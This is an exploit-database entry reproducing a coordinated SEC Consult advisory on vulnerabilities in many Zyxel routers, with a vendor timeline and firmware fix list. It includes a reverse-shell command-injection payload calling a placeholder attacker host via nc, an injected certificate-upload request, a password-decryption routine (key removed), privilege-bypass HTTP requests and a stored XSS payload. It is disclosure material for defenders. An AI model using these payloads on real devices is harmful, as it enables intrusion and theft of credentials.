Multiple Zyxel devices suffer from buffer overflow, local file disclosure, unsafe storage of sensitive data, command injection, broken access control, symbolic link processing, cross site request forgery, and cross site scripting vulnerabilities.
{"id": "1337DAY-ID-37368", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Zyxel Buffer Overflow / File Disclosure / CSRF / XSS / Broken Access Control Vulnerabilities", "description": "Multiple Zyxel devices suffer from buffer overflow, local file disclosure, unsafe storage of sensitive data, command injection, broken access control, symbolic link processing, cross site request forgery, and cross site scripting vulnerabilities.", "published": "2022-02-17T00:00:00", "modified": "2022-02-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/37368", "reporter": "Stefan Viehbock", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2023-03-14T00:52:50", "viewCount": 212, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "vulnersScore": 0.0}, "_state": {"dependencies": 1678755196, "score": 1678755234, "epss": 1679178262}, "_internal": {"score_hash": "ab8fb6e8e59faf77d7b8f30992fea648"}, "sourceHref": "https://0day.today/exploit/37368", "sourceData": "=======================================================================\n title: Multiple Critical Vulnerabilities\n product: Multiple Zyxel devices\n vulnerable version: For affected products see \"Solution\" section\n fixed version: see \"Solution\" section\n CVE number: -\n impact: Critical\n homepage: https://www.zyxel.com\n found: 2020-11-27\n by: G. Hechenberger (Office Vienna)\n S. Robertz (Office Vienna)\n S. Viehb\u00f6ck (Office Vienna)\n T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\n\"Focused on innovation and customer-centricity, Zyxel Communications Corp. has\nbeen connecting people to the internet for nearly 30 years. We keep promoting\ncreativity which meets the needs of customers. This spirit has never been\nchanged since we developed the world's first integrated 3-in-1 data/fax/voice\nmodem in 1992. Our ability to adapt and innovate with networking technology\nplaces us at the forefront of understanding connectivity for telco/service\nproviders, businesses and home users.\n\nWe're building the networks of tomorrow, helping unlock the world's potential\nand meeting the needs of the modern workplace; powering people at work, life\nand play. We stand side-by-side with our customers and partners to share new\napproaches to networking that will unleash their abilities. Loyal friend,\npowerful ally, reliable resource \u2014 we are Zyxel, Your Networking Ally.\"\n\nSource: https://www.zyxel.com/about_zyxel/company_overview.shtml\n\n\nBusiness recommendation:\n------------------------\nSEC Consult recommends Zyxel customers to upgrade the firmware to the latest\nversion available.\n\nThe collaboration between Zyxel Communications and SEC Consult will further strengthen\nZyxel's cybersecurity strategy by accelerating and optimizing the ability to respond\nto threats and vulnerabilities like those described in this advisory.\n\nhttps://sec-consult.com/blog/detail/zyxel-communications-and-sec-consult-reach-next-level-of-cybersecurity/\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so\nMultiple unauthenticated buffer overflows have been discovered in the zhttpd web\nserver. One buffer overflow is extremely simple to trigger as it occurs in the\nURI input. In case of an overlong input, the web server crashes as the return\naddress is overwritten with the input values as the function scanf() without\nlength check was used. Multiple other buffer overflows can be found in the fol-\nlowing functionalities:\n* URI parsing in libclinkc.so, if '?' is contained.\n* Export_Log functionality.\n\nAn attacker can take over the device by using the return-to-zero-protection\ntechnique as ASLR in the used Linux kernel is activated system-wide and the NX\nbit is set for the web server binary. Other protection mechanisms like PIE,\nstack canaries and relocation read only were not set. The address of libc\nshifts due to ASLR and must be brute-forced therefore. This can take up to one\nhour. However, on average, an attacker will gain a root shell in less than\n30 minutes.\n\n\n2) Unauthenticated Local File Disclosure in zhttpd\nAn endpoint in zhttpd can be used to expose system files including\n\"/etc/passwd\" and \"/etc/shadow\". This endpoint is accessible without prior\nlogin. An attacker can read all files on the system by using this endpoint.\n\n\n3) Unsafe Storage of Sensitive Data\nThe device configuration contains passwords stored in a reversible form. Rather\nthan storing passwords in an appropriate cryptographic hash format, the\npasswords are encrypted with a symmetric cipher (AES) using a static key. An\nattacker with access to the device configuration (e.g. by exploiting vulnerability\n #2) can decrypt the passwords and use them in further attacks.\n\n\n4) Authenticated Command Injection\nTwo command injections were found within the device. One was identified in the\nping diagnostic tool, the other one at the certificate upload. Both led to a\nfully compromised system as the web service was started with root permissions.\n\nIt is suspected that more command injections are present in the web interface\nof the device.\n\n\n5) Broken Access Control\nVarious access control vulnerabilities were identified where a lower privileged\nuser can access functionality of a higher privilege role.\nSome functionality is visible in the GUI only if using a user account with full\naccess permissions. However, it is not visible as standard \"admin\" user with the\nrole administrator. It can be exploited, e.g., to open ports for system services\nsuch as SSH and FTP and also to access other functionality intended to be used\nby users with full access only.\n\n\n6) Processing of Symbolic Links in ftpd\nThe FTP server on the device processes symbolic links on external storage\nmedia, e.g. formatted as NTFS. By creating a symbolic link to the root directory,\nthis can be abused to get read access to the root file system.\n\n\n7) Inadequate CSRF Implementation\nThe web interface provides CSRF tokens, which are implemented as 9-digit\nnumbers and are transmitted as \"sessionkey\" parameter. CSRF tokens rely on\nunpredictability to fulfill their function. However, an API endpoint exists on\nthe device, which can be used in an unauthenticated manner to generate and\nretrieve a new and valid CSRF token value over the internal network.\n\n\n8) Stored Cross-Site Scripting\nA stored cross-site scripting vulnerability was identified in the printer name\nfield of the print server menu within the web interface of the device. However,\nthe possible payload is limited to 32 characters and certain tags.\n\n\nProof of concept:\n-----------------\n1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so\n\nURI parsing pseudo code in zhttpd:\n-------------------------------------------------------------------------------\nchar path [256];\n[...]\n__s = (char *)cg_http_request_geturi(param_1);\npcVar2 = strstr(__s,\"Export_Log\");\nif (pcVar2 != (char *)0x0) {\n__isoc99_sscanf(__s,\"%*[^?]?%s\",path);\nreturn;\n}\n-------------------------------------------------------------------------------\nThis code will copy everything following a '?' from the URI to a 256 byte\nbuffer. As URIs are commonly allowed to contain 2048 characters, the 'path'\nbuffer can be overflown.\n\nProof of concept exploit that will obtain a root shell:\n-------------------------------------------------------------------------------\n< the remote root exploit has been removed from this advisory and will be\n published at a later date >\n-------------------------------------------------------------------------------\n\nURI handling pseudo code, when '?' is present, in libclinkc.so, which is called\nfrom zhttpd:\n-------------------------------------------------------------------------------\nchar acStack144 [128];\npcVar2 = strchr(uri_ptr,'?');\nif (pcVar2 != (char *)0x0) {\nmemset(acStack144,0,0x80);\nstrncpy(acStack144,uri_ptr,(size_t)(pcVar2 + -(int)uri_ptr));\n-------------------------------------------------------------------------------\nThis buffer can be overflown even though strncpy is used, as the copy length\nparameter 'n' is user controlled. The attacker will need to request a URL with\nmore than 128 characters and will then append a '?'.\n\n\n2) Unauthenticated Local File Disclosure in zhttpd\nThe endpoint \"Export_Log\" can be used to fetch arbitrary files as shown in the\nfollowing request that accesses the config file \"/data/zcfg_config.json\":\n-------------------------------------------------------------------------------\n< POC removed from this advisory >\n-------------------------------------------------------------------------------\n\nThis endpoint is accessible without prior authentication!\n\nThe file '/data/zcfg_config.json' will contain the running configuration of the\nrouter, including all passwords such as SIP credentials!\n\n\n3) Unsafe Storage of Sensitive Data\nThere is a proprietary password format by Zyxel denoted by the prefix\n\"_encrypt_\". This is implemented by the function encryptPassword in the binary\n\"/bin/zcmd\". Values in the configuration fields named \"Privilege\", \"Password\",\n\"DefaultPassword\" and \"OldDefaultPassword\" are passed to a function that\nderives an AES key using the OpenSSL function EVP_BytesToKey from static data.\nThe following code snippets are a re-implementation of the key derivation\nalgorithm. The key has been removed from this advisory.\n-------------------------------------------------------------------------------\nunsigned char salt[] = { 0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX };\nint encrypt_key_length;\nchar encryptKey[]= \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\";\nencrypt_key_length = strlen(encryptKey);\nunsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH];\nint datal = encrypt_key_length;\nEVP_BytesToKey(EVP_aes_256_cbc(), EVP_sha1(), (const unsigned char*)salt,\n(const unsigned char*)encryptKey, datal,5,key,iv);\nfor (int i = 0;i <= EVP_MAX_KEY_LENGTH;i++) {\nprintf(\"%02X\", key[i]);\n}\nprintf(\"\\n\");\nfor (int i = 0;i <= EVP_MAX_IV_LENGTH;i++) {\nprintf(\"%02X\", iv[i]);\n}\n-------------------------------------------------------------------------------\nThe input for the key derivation is static, so the resulting key and IV are\ntoo. Based on the information the following Python snippet was developed that\ndecrypts password entries (the key has been removed from this advisory):\n-------------------------------------------------------------------------------\ndef decrypt_zyxel_encrypt(input):\nkey=bytearray.fromhex(\n'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\niv=bytearray.fromhex('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\ninput=input.replace('_encrypt_','')\ndecoded = b64decode(input)\naes = AES.new(key, AES.MODE_CBC,iv)\ndecrypted=aes.decrypt(decoded)\nprint(repr(decrypted))\n-------------------------------------------------------------------------------\nDecrypting the password can be done with the following command:\n >> decrypt_zyxel_encrypt('_encrypt_xxxxxxxxxxxxxxxxx==')\n\nThe same password algorithm was discussed in the context of security research\non the Zyxel VMG8825-T50 before:\nhttps://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/\n\n\n4) Authenticated Command Injection\nThe input vulnerable to command injection can be found in the menu at\nMENU->Maintenance->Diagnostic. The following payload can now be used in the IP\naddress field to create a reverse shell:\n127.0.0.1;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attacker-IP Attacker-Port >/tmp/f &\n\nThe second identified possibility for a command injection was the certificate\nupload. The endpoint is not visible from the UI for a regular user, however\ndue to the broken access control, see 6), every user can interact with it.\n\n-------------------------------------------------------------------------------\nPOST /cgi-bin/Certificates?action=import_local&priv=;touch${IFS}foo&sessionkey=409106100 HTTP/1.1\nHost: <IP>\nConnection: close\nContent-Length: 1498\nContent-Type: multipart/form-data; boundary=----\nWebKitFormBoundarywlxAsQZ1maK9V9E9\nAccept: */*\nOrigin: https://<IP>\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://<IP>/Certificates\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: Session=uUgQobZKw5cUzesePtCAGhyxH3SOCE8W\n------WebKitFormBoundarywlxAsQZ1maK9V9E9\nContent-Disposition: form-data; name=\"certImportFileName\";\nfilename=\"ZyXELcert.crt\"\nContent-Type: application/pkix-cert\n-----BEGIN CERTIFICATE-----\n[...]\n-----END CERTIFICATE-----\n------WebKitFormBoundarywlxAsQZ1maK9V9E9\u2014\n-------------------------------------------------------------------------------\n\n5) Broken Access Control\n\nAs a first example, available user accounts and their privileges can be viewed\nby sending a request the following API endpoint:\nhttps://<IP>/cgi-bin/DAL?oid=login_privilege\nThe response shows usernames invisible in the GUI, here e.g., the \"root\" user.\n-------------------------------------------------------------------------------\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nContent-Length: 2906\nDate: Thu, 01 Jan 1970 22:59:49 GMT\nX-Frame-Options: sameorigin\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\n{\n\"result\": \"ZCFG_SUCCESS\",\n\"ReplyMsg\": \"Page\",\n\"ReplyMsgMultiLang\": \"\",\n\"Object\": [\n{\n\"Index0\": 1,\n\"Index1\": 1,\n\"Enabled\": true,\n\"Username\": \"root\",\n\"Password\": \"\",\n\"EnableQuickStart\": true,\n\"Privilege\": \"login\"\n},\n[...]\n-------------------------------------------------------------------------------\nAs a second example, the status of system services can be viewed by sending a\nrequest to the following API endpoint:\nhttps://<IP>/cgi-bin/DAL?oid=mgmt_srv\nThe response shows various system services, here e.g., the SSH service which\nis only open for a trusted domain (\"Trust_Dm\").\n-------------------------------------------------------------------------------\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nContent-Length: 1271\nDate: Thu, 01 Jan 1970 02:18:28 GMT\nX-Frame-Options: sameorigin\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\n{\n\"result\": \"ZCFG_SUCCESS\",\n\"ReplyMsg\": \"RestartDeamon\",\n\"ReplyMsgMultiLang\": \"\",\n\"Object\": [\n[...]\n{\n\"Index\": 5,\n\"Name\": \"SSH\",\n\"Port\": 22,\n\"Mode\": \"Trust_Dm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,\"\n},\n[...]\n-------------------------------------------------------------------------------\nSubsequently, services can also be opened. An example request to open the FTP,\nSSH and SNMP ports is given below. The request has to be sent in context of an\n\"admin\" user and has to contain a valid \"sessionkey\" value.\n-------------------------------------------------------------------------------\nPUT /cgi-bin/DAL?oid=mgmt_srv&sessionkey=575595380 HTTP/1.1\nHost: <IP>\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nIf-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT\nX-Requested-With: XMLHttpRequest\nContent-Length: 2097\nOrigin: https://<IP>\nConnection: close\nReferer: https://<IP>/RemoteManagement\nCookie: Session=6snfyaikMK5FmMcerni8cJEnzl4IgaFc\n[\n{\n\"Index\": 1,\n\"Name\": \"HTTP\",\n\"Port\": 80,\n\"Mode\": \"LAN_ONLY\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 2,\n\"Name\": \"HTTPS\",\n\"Port\": 443,\n\"Mode\": \"LAN_TstDm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": true,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 3,\n\"Name\": \"FTP\",\n\"Port\": 21,\n\"Mode\": \"LAN_ONLY\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 4,\n\"Name\": \"TELNET\",\n\"Port\": 23,\n\"Mode\": \"\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 5,\n\"Name\": \"SSH\",\n\"Port\": 22,\n\"Mode\": \"LAN_TstDm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": true,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 6,\n\"Name\": \"SNMP\",\n\"Port\": 161,\n\"Mode\": \"LAN_ONLY\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": false,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false\n},\n{\n\"Index\": 7,\n\"Name\": \"PING\",\n\"Port\": -1,\n\"Mode\": \"LAN_TstDm\",\n\"BoundInterfaceList\":\n\"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,\n,,IP.Interface.11,,,,\",\n\"LANEnable\": true,\n\"WLANEnable\": true,\n\"WANEnable\": false,\n\"TrustDmEnable\": true,\n\"Protocol\": \"https\",\n\"RestartDeamon\": false,\n\"origport\": 443,\n\"otherorigport\": 80,\n\"httpport\": 80,\n\"httpsport\": 443\n}\n]\n-------------------------------------------------------------------------------\nThe response will indicate success and the system will be restarted. Another\nrequest to the API endpoint used before to query the service status will list\nthe changed SSH mode, now shown as \"LAN_TstDm\".\n\n\n6) Processing of Symbolic Links in ftpd\nA prepared USB stick, formatted as NTFS and containing a link to the root file\nsystem (created by executing \"ln -s / sysroot\") is needed to exploit this vul-\nnerability.\n\nAfter placing the USB stick in the USB port of the device, it is automatically\nmounted to the admin user's home directory. By using the access control vulne-\nrability, described in 6), the FTP port can be opened to allow FTP access via\nthe internal network.\n\nAfter connecting to the FTP service using the \"admin\" credentials, the mounted\nUSB stick can be accessed and the \"sysroot\" symbolic link will show the\ncontent of the root file system.\n\n\n7) Inadequate CSRF Implementation\nThe following API endpoint can be used without authentication to retrieve a\nnew CSRF token:\nhttps://<IP>/changeSessionKey\nThe response contains the new session key, valid for all user accounts. The\ncurrent one will be invalidated.\n-------------------------------------------------------------------------------\nHTTP/1.1 200 OK\nContent-Type: application/json\nContent-Length: 43\nDate: Thu, 01 Jan 1970 12:29:50 GMT\nX-Frame-Options: sameorigin\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\n[\n{\n\"SessionKey\": 583723980\n}\n]\n-------------------------------------------------------------------------------\n\n8) Stored Cross-Site Scripting\nBy browsing to \"MENU->Network Setting->USB Service->Print Server\", the field\n\"User Defined Printer Name\" can be used to place a stored cross-site scripting\npayload. The following code was used as proof-of-concept:\n\nP<img src=x onerror=alert('XSS')>\n\nIn a PUT request, this action looks like the following listing in the proxy:\n-------------------------------------------------------------------------------\nPUT /cgi-bin/DAL?oid=print_server&sessionkey=578218320 HTTP/1.1\nHost: <IP>\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nIf-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT\nX-Requested-With: XMLHttpRequest\nContent-Length: 106\nOrigin: <IP>\nConnection: close\nCookie: activeMenuID=maintain_settings; activeSubmenuID=log;\nSession=Fg2kSHIfZW5mhySEY4vJfrElXE4TSLEl\n{\n\"Enable\":false,\n\"IppMake\":\"PRINTER\",\n\"IppDevice\":\"/dev/printer0\",\n\"IppName\":\"P<img src=x onerror=alert('XSS')>\"\n}\n-------------------------------------------------------------------------------\nThe printer name will be stored and displayed on the same page, executing the\npayload.\n\n\nVulnerable / tested versions:\n-----------------------------\nMultiple devices are affected. See section \"solution\" for the list of affected models\nprovided by the vendor including the patched firmware version. All firmware older than\nthose listed are affected.\n\n\nVendor contact timeline:\n------------------------\n2021-01-21 | Contacting vendor via [email\u00a0protected] Received confirmation\n from Zyxel employee.\n2021-02-09 | Zyxel confirms vulnerabilities and is working on a fix. Zyxel asks\n for more time; extended advisory disclosure date to 2021-05-20.\n2021-04-09 | Asked for an update.\n2021-04-13 | Zyxel stated that updates on the issues will be provided soon.\n2021-04-28 | Phone call with Zyxel. Zyxel contact stated that all issues were\n resolved.\n2021-05-01 | Zyxel stated that a status update will follow in the next weeks.\n2021-05-19 | Zyxel PSIRT sent a list with feedback to all discovered issues.\n2021-06-01 | Zyxel PSIRT updated the list and added a patch plan including timing.\n Updates the earliest updates on the security issues were scheduled\n for Q3 2021.\n2021-09-02 | Status meeting with Zyxel. The advisory disclosure shifts back to\n Q4 2021 due to more affected products.\n2021-11-07 | Security advisory disclosure plan discussion with Zyxel. Vendor stated\n that more products must be internally reviewed. The advisory can be released\n in Q1 2022 if no further devices are affected .\n2022-01-25 | Asking vendor regarding coordinated advisory release date.\n2022-02-03 | Asking vendor again for a status update.\n2022-02-07 | Vendor reply that affected models are still being consolidated.\n2022-02-10 | Received final list of affected models.\n2022-02-15 | Zyxel publishes their security advisory.\n2022-02-15 | Coordinated release of security advisory.\n\n\nSolution:\n---------\nInstall the current version of the firmware for the affected product. According to the\nvendor, the following firmware versions fix the identified security issues:\n\nAffected EOL products (list not necessarily complete) which will not get an update:\n\nAMG1302-T11C EOL\nVMG3925-B10C EOL\nVMG8924-B10D EOL\nVMG1312-B10D EOL\nVMG3312-T20A EOL\nVMG3625-T20A EOL\nVMG3925-B10B EOL\nVMG3925-B10C EOL\nVMG3925-B30C EOL\nVMG3926-B10A EOL\nVMG5313-B10B EOL\nVMG5313-B30B EOL\nVMG8623-T50A EOL\nVMG8823-B10B EOL\nVMG8823-B30B EOL\nVMG8823-B50B EOL\nVMG8823-B60B EOL\nVMG8924-B10D EOL\nVMG8924-B30D EOL\nPMG5317-T20A EOL\n\n\nAffected product Model / Patch availability\nCPE:\nDX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*\nDX5401-B0 V5.17(ABYO.1)C0*\nEMG3525-T50B EMEA - V5.50(ABPM.6)C0*\n S. America - V5.50(ABSL.0)b12 in Sep. 2022*\nEMG5523-T50B EMEA - V5.50(ABPM.6)C0*\n S. America - V5.50(ABSL.0)b12 in Sep. 2022*\nEMG5723-T50K V5.50(ABOM.7)C0*\nEX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*\nEX5401-B0 V5.17(ABYO.1)C0*\nEX5501-B0 V5.17(ABRY.2)C0*\nLTE3301-PLUS V1.00(ABQU.3)C0*\nLTE7240-M403 V2.00(ABMG.4)C0*\nVMG1312-T20B V5.50(ABSB.5)C0*\nVMG3625-T50B V5.50(ABPM.6)C0*\nVMG3927-B50A V5.17(ABMT.6)C0*\nVMG3927-B60A V5.17(ABMT.6)C0*\nVMG3927-T50K V5.50(ABOM.7)C0*\nVMG4005-B50A V5.15(ABQA.2)C0 in Mar. 2022*\nVMG8623-T50B V5.50(ABPM.6)C0*\nVMG8825-B50A V5.17(ABMT.6)C0*\nVMG8825-B50B V5.17(ABNY.7)C0*\nVMG8825-B60A V5.17(ABMT.6)C0*\nVMG8825-B60B V5.17(ABNY.7)C0*\nVMG8825-T50K V5.50(ABOM.7)C0*\nXMG3927-B50A V5.17(ABMT.6)C0*\nXMG8825-B50A V5.17(ABMT.6)C0*\n\nFirewall:\nVPN2S V1.20(ABLN.2)_00210319C1*\n\nONT:\nAX7501-B0 V5.17(ABPC.1)C0*\nEP240P V5.40(ABVH.1)C0 in May 2022*\nPMG5317-T20B V5.40(ABKI.4)C0 in Apr. 2022*\nPMG5617GA V5.40(ABNA.2)C0 in Apr. 2022*\nPMG5622GA V5.40(ABNB.2)C0 in Apr. 2022*\n\nWiFi extender:\nWX3100-T0 V5.50(ABVL.1)C0 in Mar. 2022*\nWX3401-B0 V5.17(ABVE.1)C0*\n\nWiFi system:\nWSQ50 (Multy X) V2.20(ABKJ.7)C0\nWSQ60 (Multy Plus) V2.20(ABND.8)C0\n\n*Please reach out to your local Zyxel support team for the updated firmware file.\n\n\nFor further information, please see the vendor's advisory as well:\nhttps://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities.shtml\n\nPage from the vendor regarding affected devices:\nhttps://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities_Products.shtml\n", "category": "web applications", "verified": true}
Zyxel Buffer Overflow / File Disclosure / CSRF / XSS / Broken Access Control Vulnerabilities